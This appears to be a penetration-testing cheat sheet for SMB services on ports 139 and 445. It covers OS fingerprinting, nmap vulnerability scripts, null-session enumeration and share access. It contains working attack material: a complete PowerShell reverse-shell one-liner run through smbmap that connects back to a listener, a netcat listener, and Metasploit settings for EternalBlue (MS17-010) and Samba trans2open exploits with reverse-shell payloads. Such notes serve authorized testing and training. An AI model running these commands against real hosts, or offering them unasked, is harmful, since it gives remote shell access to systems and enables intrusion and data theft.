139/445 - SMB

General information

SMB dialect => first Windows version to ship it (useful to fingerprint the OS from the negotiated dialect):
SMB1 (NT1)  => Win2000 / XP / 2003 (SMB1-only hosts will not negotiate anything newer)
SMB2.0      => Vista / 2008
SMB2.1      => Win7 / 2008R2
SMB3.0      => Win8 / 2012
SMB3.02     => Win8.1 / 2012R2
SMB3.1.1    => Win10 / 2016 and later

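# Configuration tips
# It can be useful to pin the client-side protocol range in /etc/samba/smb.conf
# ([global] section) so smbclient/nmblookup negotiate SMB2/SMB3 rather than SMB1:
client min protocol = SMB2
client max protocol = SMB3

# Caveat: with "client min protocol = SMB2" the client tools will refuse to talk
# to SMB1-only targets (Win2000/XP/2003, very old Samba). Lower it to NT1 for those.
#
# These are *client* settings: each client tool reads smb.conf when it starts, so
# no daemon restart is needed for them. Only restart smbd if you changed server-side
# options too - and remember a local smbd owns TCP 445, which will collide with any
# reverse-shell listener you later try to bind on that port.
service smbd restart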

Identification

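# Port 139 (NetBIOS session service)
# Use nbtscan to identify the NetBIOS host name and domain/workgroup
nbtscan <IP>

# Identify SMB2 support using metasploit (scanner modules take RHOSTS; a range or CIDR works)
use auxiliary/scanner/smb/smb2
set RHOSTS <IP>
run

# Discover the real Samba version if the banner is hidden: sniff the negotiate
# response on the interface facing the target (replace tap0) while smbclient
# triggers it. Use plain ASCII single quotes - curly quotes break the shell.
ngrep -i -d tap0 's.?a.?m.?b.?a.*[[:digit:]]' & smbclient -L //<IP>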


### Services and Resources Scanning


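# Base nmap (replace xxxx with one or more NSE scripts from the list below,
# e.g. --script=smb-os-discovery,smb-security-mode)
nmap -v --script=xxxx -p T:139,445 <IP>

# Hard nmap (UDP 137 = NetBIOS name service; -sU and -sS need root)
nmap -n -sV --version-intensity=5 -sU -sS -Pn -p T:139,445,U:137 --script=xxx <IP>

# SMB-related NSE scripts
# Try to retrieve the NetBIOS name table and MAC address (talks to UDP 137)
nbstat

# Enum (most of these need either a null session or valid credentials; pass them with
# --script-args smbusername=...,smbpassword=...,smbdomain=...)
smb-enum-domains
smb-enum-groups
smb-enum-processes
smb-enum-sessions
smb-os-discovery
smb-server-stats
smb-system-info

# Attempts to retrieve useful information about files shared on SMB volumes
smb-ls

# Queries information managed by the Windows Master Browser
smb-mbenum

# Try to print something (noisy: the job lands in the target's print spooler)
smb-print-text

# Get security level information about SMB (message signing enabled/required?).
# "signing disabled / not required" is what makes a host a candidate for NTLM relay.
smb-security-mode

# Vulns - read the safety note before running any of these against production.
# Wildcard: --script=smb-vuln*   Some of these are gated behind --script-args=unsafe=1
# and will refuse to run without it.
smb-vuln-conficker (dangerous, can crash the target)
smb-vuln-ms06-025 (Buffer overflow in RRAS)
smb-vuln-ms07-029 (Buffer overflow which can crash the RPC interface in the DNS Server)
smb-vuln-ms08-067 (Buffer overflow/RCE. Dangerous, can crash the target)
smb-vuln-ms10-054 (Remote memory corruption. Result is a BSOD -> DANGEROUS, needs unsafe=1)
smb-vuln-ms10-061 (Print spooler vulnerability. Safe, can't crash the target)
smb-vuln-ms17-010 (EternalBlue RCE; this script only checks whether the host is vulnerable - safe)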

Enumeration

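# Get the NetBIOS name table from an IP
nmblookup -A <IP>


# Enumeration using enum4linux (-a = everything; -R = RID ranges to cycle through
# over a null session to recover user names). Identifies name/domain, users and
# shares. The target argument is required:
enum4linux -a -R 500-600,950-1150 <IP>


# Smbclient
# List shares (prompts for a password; -N skips authentication = null session)
smbclient -L //<IP>
smbclient -N -L //<IP>

# Connect to a share (backslashes are doubled for the shell)
smbclient \\\\<IP>\\share
# With domain credentials. Use plain ASCII quotes; single quotes keep the shell
# from interpreting the backslash. A password on the command line is visible in
# `ps` and shell history - prefer the prompt, the PASSWD env var, or -A <authfile>.
smbclient -U 'DOMAINNAME\Username' \\\\<IP>\\IPC$ password

# Null session: empty username and no password
smbclient -U '' -N \\\\<IP>\\IPC$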


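# Nullinux: null-session (or authenticated) enumeration of users and shares
# Users only, quick mode, against a DC by name
nullinux -users -quick DC1.Domain.net
# Everything, against a small range
nullinux -all 192.168.0.0-5
# Shares only, with domain credentials, against a comma-separated host list
nullinux -shares -U 'Domain\User' -P 'Password1' 10.0.0.1,10.0.0.5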


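# Smbmap for domains (list share drives, drive permissions, share contents, upload/download ...)
# All user names, passwords and hosts below are placeholders from the smbmap README.
# Basic enumeration (-p takes a password or an NTLM hash)
python smbmap.py -u jsmith -p password1 -d workgroup -H 192.168.0.1

# Remote command execution (-x needs local-admin rights on the target; it runs the
# command through a service on the host, so expect event-log / EDR noise)
python smbmap.py -u 'apadmin' -p 'asdf1234!' -d ACME -H 10.1.3.30 -x 'net group "Domain Admins" /domain'

# Non-recursive path listing
python smbmap.py -H 172.16.0.24 -u Administrator -p 'changeMe' -r 'C$\Users'

# File content searching (regex matched against file contents on every share)
python smbmap.py --host-file ~/Desktop/smb-workstation-sml.txt -u NopSec -p 'NopSec1234!' -d widgetworld -F '[1-9][0-9][0-9]-[0-9][0-9]-[0-9][0-9][0-9][0-9]'

# Drive listing
python smbmap.py -H 192.168.1.24 -u Administrator -p 'R33nisP!nckle' -L

# Reverse shell through smbmap -x (PowerShell one-liner from the smbmap README).
# Replace 1.1.1.1 / 4445 with your listener. The original one-liner called an
# undefined "cleanup" function on disconnect; it now calls ReverseShellClean.
python smbmap.py -u jsmith -p 'R33nisP!nckle' -d ABC -H 192.168.2.50 -x 'powershell -command "function ReverseShellClean {if ($c.Connected -eq $true) {$c.Close()}; if ($p.ExitCode -ne $null) {$p.Close()}; exit; };$a=""""1.1.1.1""""; $port=""""4445"""";$c=New-Object system.net.sockets.tcpclient;$c.connect($a,$port) ;$s=$c.GetStream();$nb=New-Object System.Byte[] $c.ReceiveBufferSize  ;$p=New-Object System.Diagnostics.Process  ;$p.StartInfo.FileName=""""cmd.exe""""  ;$p.StartInfo.RedirectStandardInput=1  ;$p.StartInfo.RedirectStandardOutput=1;$p.StartInfo.UseShellExecute=0  ;$p.Start()  ;$is=$p.StandardInput  ;$os=$p.StandardOutput  ;Start-Sleep 1  ;$e=new-object System.Text.AsciiEncoding  ;while($os.Peek() -ne -1){$out += $e.GetString($os.Read())} $s.Write($e.GetBytes($out),0,$out.Length)  ;$out=$null;$done=$false;while (-not $done) {if ($c.Connected -ne $true) {ReverseShellClean} $pos=0;$i=1; while (($i -gt 0) -and ($pos -lt $nb.Length)) { $read=$s.Read($nb,$pos,$nb.Length - $pos); $pos+=$read;if ($pos -and ($nb[0..$($pos-1)] -contains 10)) {break}}  if ($pos -gt 0){ $string=$e.GetString($nb,0,$pos); $is.write($string); start-sleep 1; if ($p.ExitCode -ne $null) {ReverseShellClean} else {  $out=$e.GetString($os.Read());while($os.Peek() -ne -1){ $out += $e.GetString($os.Read());if ($out -eq $string) {$out="""" """"}}  $s.Write($e.GetBytes($out),0,$out.length); $out=$null; $string=$null}} else {ReverseShellClean}};"'

# Attacker side: listener on the port used above (traditional netcat needs -p;
# OpenBSD netcat also accepts "nc -l 4445")
nc -lvnp 4445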

MS17-010 Exploitation

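# Using metasploit
# (IMPORTANT: ms17_010_psexec drops the payload on the target. With a *staged*
#  payload - windows/shell/reverse_tcp or windows/meterpreter/reverse_tcp - the
#  handler started by "exploit -j" must stay up to serve the second stage; a
#  stageless payload such as windows/shell_reverse_tcp avoids that dependency.)
# (IMPORTANT 2: if the module reports that it cannot find its object/target,
#  try a different TARGET value.)
use exploit/windows/smb/ms17_010_psexec
set SHARE ADMIN$
set SMBDomain ALICE        # example - set the target's domain
set ALLOW_GUEST true
# LPORT is the port the *attacker* listens on. 445 is sometimes chosen because
# outbound 445 is rarely filtered, but it collides with a local smbd (stop it first).
set LPORT 445
set LHOST 10.11.0.179      # attacker IP reachable from the target
set RHOSTS 10.11.1.5       # canonical option is RHOSTS (RHOST is only an alias)
set TARGET 3       (TARGET 1 = PowerShell / TARGET 2 = Native upload / TARGET 3 = MOF upload => requires the ADMIN$ share)
set PAYLOAD windows/shell/reverse_tcp
set VERBOSE true
set DBGTRACE true
set EXITFUNC thread
exploit -j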

Trans2open Exploitation

# Samba 2.2.X are usually vulnerable to trans2open
# Using metasploit
use exploit/linux/samba/trans2open
set VERBOSE true
set PAYLOAD linux/x86/shell_reverse_tcp
set RHOST IP
set LPORT 443
set LHOST IP
exploit -j -z
# You can mount the root fiilesystem to a share you can access
https://www.exploit-db.com/exploits/33599

# Using metasploit
https://www.exploit-db.com/exploits/33598
use auxiliary/admin/smb/samba_symlink/traversal